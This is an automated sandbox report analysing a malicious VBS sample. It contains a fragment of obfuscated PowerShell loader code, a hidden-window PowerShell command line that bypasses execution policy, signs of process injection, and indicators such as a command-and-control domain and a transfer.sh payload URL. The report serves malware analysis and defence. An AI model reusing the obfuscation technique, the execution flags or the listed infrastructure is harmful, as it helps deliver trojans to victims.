-f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	111 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	211 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	21 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	121 Scripting	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 PowerShell	Logon Script (Mac)	Logon Script (Mac)	211 Process Injection	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	121 Scripting	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YBAXAKQXVYWIXQJDE.VBS	0%	Virustotal		Browse
YBAXAKQXVYWIXQJDE.VBS	0%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.0.aspnet_compiler.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1202858	Download File
11.2.aspnet_compiler.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202858	Download File
11.0.aspnet_compiler.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1202858	Download File
11.0.aspnet_compiler.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202858	Download File
11.0.aspnet_compiler.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1202858	Download File
11.0.aspnet_compiler.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1202858	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
nyanwmoney.duckdns.org	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.microsof	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://www.microsoft.A	0%	Avira URL Cloud	safe
http://crl.m&	0%	Avira URL Cloud	safe
https://www.vign.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
nyanwmoney.duckdns.org	37.120.141.190	true	true	unknown
transfer.sh	144.76.136.153	true	false	high
store-images.s-microsoft.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nyanwmoney.duckdns.org	true	Avira URL Cloud: safe	unknown
https://transfer.sh/get/8J0O0I/Server435.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://transfer.sh/get/8J0O0I/Server435.	wscript.exe, 00000000.00000003.424203468.000002D26132C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.427392004.000002D261330000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	false		high
http://transfer.sh	powershell.exe, 00000002.00000002.951646438.000001EE654C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsof	powershell.exe, 00000002.00000003.439498717.000001EE7C958000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439275078.000001EE7C92B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439437787.000001EE7C945000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000002.00000002.951940043.000001EE655DC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.sh	powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951619061.000001EE654B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.A	powershell.exe, 0000000A.00000002.949377445.000001A6589CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://transfer.sh/get/8J0O0I/Serv	powershell.exe, 00000002.00000002.947754218.000001EE649AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948316787.000001EE64CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947600493.000001EE6492C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947097260.000001EE6480A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947552930.000001EE6490D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948531822.000001EE64D70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947842716.000001EE64A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948056804.000001EE64AF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948070341.000001EE64AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947244377.000001EE64846000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951334266.000001EE653F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948446290.000001EE64D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948106783.000001EE64B19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946965465.000001EE647DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946689944.000001EE6478B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947963667.000001EE64A96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.943977734.000001EE642D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.943924547.000001A6408C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943675482.0000000003222000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943615778.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m&	powershell.exe, 00000002.00000002.953679906.000001EE7C810000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.vign.	powershell.exe, 0000000A.00000002.949279399.000001A65895F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://transfer.sh/get/8J0O0I/Se	wscript.exe, wscript.exe, 00000000.00000003.422141955.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428034000.000002D2616A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428144405.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.421946450.000002D263127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428138665.000002D263120000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.120.141.190	nyanwmoney.duckdns.org	Romania		9009	M247GB	true
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	585402
Start date:	08.03.2022
Start time:	20:25:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	YBAXAKQXVYWIXQJDE.VBS
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@7/7@3/2
EGA Information:	Successful, ratio: 33.3%
HDC Information:	Failed
HCA Information:	Successful, ratio: 94% Number of executed functions: 35 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .VBS Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target powershell.exe, PID 6592 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7112 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:26:21	API Interceptor	64x Sleep call for process: powershell.exe modified
20:27:15	API Interceptor	1185x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37.120.141.190	ANVJYRGCEHLJVEQHRRQKR.VBS	Get hash	malicious	Browse
	GBTVHWQCB_INVOICE#07JDKAS.vbs	Get hash	malicious	Browse
	EncKAO.vbs	Get hash	malicious	Browse
	STJQYIULUDCELUOGYJKBGX.vbs	Get hash	malicious	Browse
	DRGRKEYUTGCHG.VBS	Get hash	malicious	Browse
	CQNUQGCNZ.VBS	Get hash	malicious	Browse
	ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.VBS	Get hash	malicious	Browse
	KTROWQANB.vbs	Get hash	malicious	Browse
	GWQOPR308UMK.vbs	Get hash	malicious	Browse
	FOTEBAIVTEFWHGWPFXWPNT.vbs	Get hash	malicious	Browse
	TDGHSJW802.vbs	Get hash	malicious	Browse
	EHBDJKND.vbs	Get hash	malicious	Browse
	CENBXDAVRJPNARLDAAOUB.VBS.vbs	Get hash	malicious	Browse
	GOBBOKGQTJLBIVZAE.VBS.vbs	Get hash	malicious	Browse
	second_pe.exe	Get hash	malicious	Browse
144.76.136.153	4G5k6vDDlx.exe	Get hash	malicious	Browse	transfer.sh/get/a9xgDe/Gudsp.jpg
	81cofLYh1o.exe	Get hash	malicious	Browse	transfer.sh/get/guc4Cl/Mppvcqd.jpg
	SecuriteInfo.com.Trojan.DownloaderNET.322.17731.exe	Get hash	malicious	Browse	transfer.sh/get/uM4ooB/Xvyspuzxq.png
	Hr0Hgb5CWj.exe	Get hash	malicious	Browse	transfer.sh/get/q9wdd6/Mvuizr.log
	3baQS3WUdx.exe	Get hash	malicious	Browse	transfer.sh/get/IJwL7t/Kkvkby.png
	Jnfgs.exe	Get hash	malicious	Browse	transfer.sh/get/SkEyQd/Jnfgs.png
	Cheat_Setup.exe	Get hash	malicious	Browse	transfer.sh/get/6MBXDe/Srueaakv.png
	FCsaYN4YXX.exe	Get hash	malicious	Browse	transfer.sh/get/bwkgO4/Daggl.jpg
	vVh3lBaKu8.exe	Get hash	malicious	Browse	transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
	Jaravoi.exe	Get hash	malicious	Browse	transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
	Qxyey.exe	Get hash	malicious	Browse	transfer.sh/get/5WciVO/Qxyey.jpg
	AutoInstall.exe	Get hash	malicious	Browse	transfer.sh/get/Vr8NiB/Sgntfszp.log
	setup.exe	Get hash	malicious	Browse	transfer.sh/get/Vr8NiB/Sgntfszp.log
	r1gnvYRnsz.exe	Get hash	malicious	Browse	transfer.sh/get/Vr8NiB/Sgntfszp.log
	C4TdpMeL4x.exe	Get hash	malicious	Browse	transfer.sh/get/Q2ccFQ/Mruvwuq.jpg
	m28WwC2t8H.exe	Get hash	malicious	Browse	transfer.sh/get/fTXBOF/Sldabyj.png
	EasyCheat.exe	Get hash	malicious	Browse	transfer.sh/get/ittola/Scqrsdtrl.png
	OZ5XkYPXcG.exe	Get hash	malicious	Browse	transfer.sh/get/XN16WS/Psminaz.png
	ORDER 211011A.xlsm	Get hash	malicious	Browse	transfer.sh/get/HyKymv/wordart.exe
	ORDER 211011A.xlsm	Get hash	malicious	Browse	transfer.sh/get/HyKymv/wordart.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
transfer.sh	xQKVNbYBXK.exe	Get hash	malicious	Browse	144.76.136.153
	CollectivegoodsTax2021.xll	Get hash	malicious	Browse	144.76.136.153
	P7wyqpDUSa.exe	Get hash	malicious	Browse	144.76.136.153
	Image_00231.exe	Get hash	malicious	Browse	144.76.136.153
	rZU5WUPcHH.xll	Get hash	malicious	Browse	144.76.136.153
	ibYZV9ljZc.exe	Get hash	malicious	Browse	144.76.136.153
	opy8DyMbuL.exe	Get hash	malicious	Browse	144.76.136.153
	8r242AqwrL.exe	Get hash	malicious	Browse	144.76.136.153
	c0887fac0c1921b6678e81a90619bda7f0ffb9abee995.exe	Get hash	malicious	Browse	144.76.136.153
	SchoolManagementu.exe	Get hash	malicious	Browse	144.76.136.153
	Loader v7.3.8.exe	Get hash	malicious	Browse	144.76.136.153
	4G5k6vDDlx.exe	Get hash	malicious	Browse	144.76.136.153
	3i4sGb3lxC.exe	Get hash	malicious	Browse	144.76.136.153
	XJtsq05BSP.exe	Get hash	malicious	Browse	144.76.136.153
	aMP8WEeMcA.exe	Get hash	malicious	Browse	144.76.136.153
	WBIy6QzxFS.exe	Get hash	malicious	Browse	144.76.136.153
	81cofLYh1o.exe	Get hash	malicious	Browse	144.76.136.153
	UUt0zYs8mq.exe	Get hash	malicious	Browse	144.76.136.153
	CDs1Ilea1p.exe	Get hash	malicious	Browse	144.76.136.153
	3Zaj25irbW.exe	Get hash	malicious	Browse	144.76.136.153
nyanwmoney.duckdns.org	ANVJYRGCEHLJVEQHRRQKR.VBS	Get hash	malicious	Browse	37.120.141.190

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	shhjvsjgwG.exe	Get hash	malicious	Browse	95.216.4.252
	n5dSv9IhtG.exe	Get hash	malicious	Browse	148.251.234.83
	fNOCSNukvE.exe	Get hash	malicious	Browse	148.251.234.93
